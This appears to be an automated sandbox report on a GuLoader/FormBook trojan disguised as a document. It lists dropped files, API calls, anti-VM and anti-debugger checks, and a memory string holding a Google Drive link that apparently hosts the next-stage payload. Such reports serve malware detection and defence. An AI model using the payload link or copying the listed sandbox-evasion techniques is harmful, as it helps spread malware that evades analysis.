Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC1DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/1@2/2

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC5849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC4E80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Command line argument: Kernel32.dll

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Original Doc Ref SN02853801324189923.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Original Doc Ref SN02853801324189923.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Original Doc Ref SN02853801324189923.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Original Doc Ref SN02853801324189923.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Original Doc Ref SN02853801324189923.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Original Doc Ref SN02853801324189923.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Original Doc Ref SN02853801324189923.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Original Doc Ref SN02853801324189923.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: Original Doc Ref SN02853801324189923.exe
Source:	Binary string: wntdll.pdbUGP source: Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Semiha.exe, Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source:	Binary string: wextract.pdbPp source: Original Doc Ref SN02853801324189923.exe

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000019.00000000.481436441.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.482011607.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.779078252.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	Code function: 0_2_00FC78A1 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_00404C39 pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_00406D5F push ebp; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_00406B0D push ss; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E4E50 push B1CC20AFh; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E5276 push esp; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E4316 push ds; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E1328 push esp; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E1321 push eax; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E0005 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E0078 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E3DDD push ss; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E3DD5 push ss; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E5560 push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E81D0D1 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00560078 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00560005 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00565560 push esp; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00563DD5 push ss; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00563DDD push ss; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00564E50 push B1CC20AFh; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00565276 push esp; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00564316 push ds; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00561321 push eax; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00561328 push esp; ret

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC2DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: initial sample

Static PE information: section name: .text entropy: 7.1128813164

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC1910 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VQWZ_R4BQMLYR0EWMVVJ53NSYRGJMPKL
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Code function: 25_2_1E7F6A60 rdtscp

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC532F GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC21E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\

Source: explorer.exe, 0000001C.00000002.771094420.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001C.00000002.771094420.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Semiha.exe, 00000019.00000003.742387045.000000000091D000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779208842.000000000091D000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW-
Source: explorer.exe, 0000001C.00000002.771382701.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Semiha.exe, 00000019.00000003.742387045.000000000091D000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779208842.000000000091D000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001C.00000000.752050950.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Semiha.exe, 00000002.00000002.482151039.0000000002B20000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: explorer.exe, 0000001C.00000002.771382701.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: explorer.exe, 0000001C.00000002.766113713.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: explorer.exe, 0000001C.00000000.752050950.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000001C.00000002.771382701.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl
Source: explorer.exe, 0000001C.00000002.768967562.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Semiha.exe, 00000002.00000002.482205968.0000000002C3A000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Semiha.exe, 00000019.00000002.779414736.000000000229A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC2DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Code function: 25_2_1E7F6A60 rdtscp

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029EBA69 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029EC093 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029E9CA7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E85FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7D766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8446A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E890EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E890EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E890EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E87FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E898ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7F16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7D76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7F36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E87FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E87B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E87B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7FD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7FD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E80927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E88138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E895BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	<

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Original Doc Ref SN02853801324189923.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging: